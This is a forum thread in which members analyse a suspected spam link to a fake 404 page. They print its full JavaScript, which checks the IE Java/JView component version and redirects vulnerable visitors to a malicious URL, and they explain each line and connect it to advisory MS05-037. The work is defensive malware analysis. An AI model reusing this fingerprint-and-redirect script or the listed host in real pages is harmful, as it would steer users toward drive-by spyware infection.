Jump to content

Always getting a 404 error :(


Nikkytas
 Share

Recommended Posts

Friend of mine tell me about some statistic information available at this page:

http:/www.abetterstart.com/c/2000/counter21.php

However, every time i hit it, it says 404 error, while my friend getting content page.

I don't think i doing anything wrong, but damn... I just can't figure what can be done to get this page visible :((((

Link to comment
Share on other sites

Friend of mine tell me about some statistic information available at this page:

http:/www.abetterstart.com/c/2000/counter21.php

However, every time i hit it, it says 404 error, while my friend getting content page.

I don't think i doing anything wrong, but damn... I just can't figure what can be done to get this page visible :((((

I have taken one of the "/" out of your post until I can determine if this is spam, something else, or completely legit.

Link to comment
Share on other sites

It's definitively spam, that isn't the server genuine 404 error.

Set your user agent to IE and it returns (what appears to be) a JavaScript exploit for IE, the code is shown below (but not all the code, there is more if you follow the JavaScript URLs, you will eventually end up at this page:http:/www.abetterstart.com/c/2000/counter21.php?j=1, could be a exploit payload):

<HTML>

<HEAD>

<TITLE>404 error - Document Not Found</TITLE>

</HEAD>

<STYLE>

BODY {

BEHAVIOR: url(#default#clientCaps)

}

</STYLE>

<BODY id=testing>

<script language='javascript'>

var i,l,v;

num = 3;

s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';

l = testing.isComponentInstalled(s,'ComponentID');

v = testing.getComponentVersion(s,'ComponentID');

if (l == true) {

x = v.split(',');

if ( (x[0]!=0) && (x[2]<3810) ) {

num = 1;

}

}

c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;

window.location = c;

</script>

</BODY>

</HTML>

Well... this is either spam or the guy asking was smart enough to use Firefox and not get his box owned :lol:

Link to comment
Share on other sites

That isn't exploit code, it's just checking if Java is installed, a specific version and allowed. Then it hops you to the next site that infects your computer with spyware. Just ran it through a sandbox.

I took your URL out as well. I don't want people clicking on it on accident.

It's Vako's call if he wants it gone.

Link to comment
Share on other sites

Code explained:

Initialize Javascript and declare variables: (no big deal)

&lt;script language='javascript'&gt;

var i,l,v;

num = 3;

This is the register entry for Internet Explorer for the Java component. Run regedit and do a search just for the alphanumerics in the brackets:

s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';

You should find it at: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupClsidFeature

Uses a boolen test to verify that the Java component exists:

l = testing.isComponentInstalled(s,'ComponentID');

Saves the whole value of the registry key to the value 'v':

v = testing.getComponentVersion(s,'ComponentID');

Mine looked like this -> {08B0E5C0-4FCB-11CF-AAA5-00401C608500}!5,0,3200,0

This is where it starts checking for what it wants:

Is the component installed? If yes, continue:

if (l == true) {

Split up the 'v' variable using the delimiter ",":

x = v.split(',');

If there is a version and it is less than 3810 then change "num" to 1;

if ( (x[0]!=0) &amp;&amp; (x[2]&lt;3810) ) {

num = 1;

Send the user to a specific site based on the results and value of "num"

 c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num;

window.location = c;

So, people who are "vulnerable" would go to: http:/www.abetterstart.com/v/200/counter21.php?b=1

And those who aren't go to: http:/www.abetterstart.com/v/200/counter21.php?b=3

again, with the "/" taken out.

Link to comment
Share on other sites

It's Vako's call if he wants it gone.

Nope, this is perfect. Instead of idle threats against the spammer, you've actually gone threw what its trying to do. Net result: We all learned a little more and the spammer is exposed.

Link to comment
Share on other sites

Which version of Java did you have installed on that sandbox?

Also, how did you determine that it's in fact Java? Common knowledge, or something in the key that gave it away?

Link to comment
Share on other sites

That was the tip I needed.

They're testing to see if you're vulnerable to the problem in the JView Profiler which could allow remote code execution.

Microsoft Advisory MS05-37: http://www.microsoft.com/technet/security/...n/MS05-037.mspx

Secunia Advisory SA15891: http://secunia.com/advisories/15891/

Version 3810 specifically fixes this particular problem, which started out with this: http://www.microsoft.com/technet/security/...ory/903144.mspx

The flaw was originally discovered in july 2005 so if you didn't update your system since then... Well, in that case you kinda deserve to get hacked, really.

Link to comment
Share on other sites

Yes, but the question is not how many of "US" this attack will fail against. It's how many of our mothers and fathers and grandparents this attack will fail against. How many organizations use IE because of policy, and not allow installation of Firefox or Opera? Statistics is a scary thing when you start thinking global.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...